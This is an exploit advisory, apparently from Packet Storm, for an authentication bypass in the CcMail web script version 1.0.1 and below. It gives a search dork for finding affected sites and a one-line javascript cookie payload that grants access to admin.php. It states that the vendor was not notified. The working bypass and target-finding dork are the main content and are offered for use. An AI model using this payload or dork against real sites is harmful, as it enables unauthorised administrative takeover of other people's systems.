CcMail version 1.01 and below suffer from an insecure handling of cookie data.
c2263bea8594ac8f352f86436fd1f36e91d417386e15b14d2bbf1953d5a07109--==+================================================================================+==--
--==+ CcMail <= 1.0.1 Insecure Cookie Handling +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 11 April 2008
Script Download: http://www.cicoandcico.com/download/download.php?SortBy=1&fdir=./ccmail/
DORK: "Emanuele Guadagnoli" "CcMail"
Vendor Has Not Been Notified!
DESCRIPTION:
CcMail (all versions) suffers from insecure cookie handling, this allows the remote attacker to set a cookie
and be granted access to the admin area. this is because CcMail only checks if the cookie exists, it doesnt
compare the data.
by entering the below javascript into your (firefox/thunderbird etc) cookies will be created allowing you
to login to "admin.php"
Exploit:
javascript:document.cookie = "name=admin; path=/;"; document.cookie = "this_cookie=admin; path=/;";
NOTE/TIP:
after running the above code you will be able to visit the admin area at "admin.php"
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
--==+================================================================================+==--
--==+ CcMail <= 1.0.1 Insecure Cookie Handling +==--
--==+================================================================================+==--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed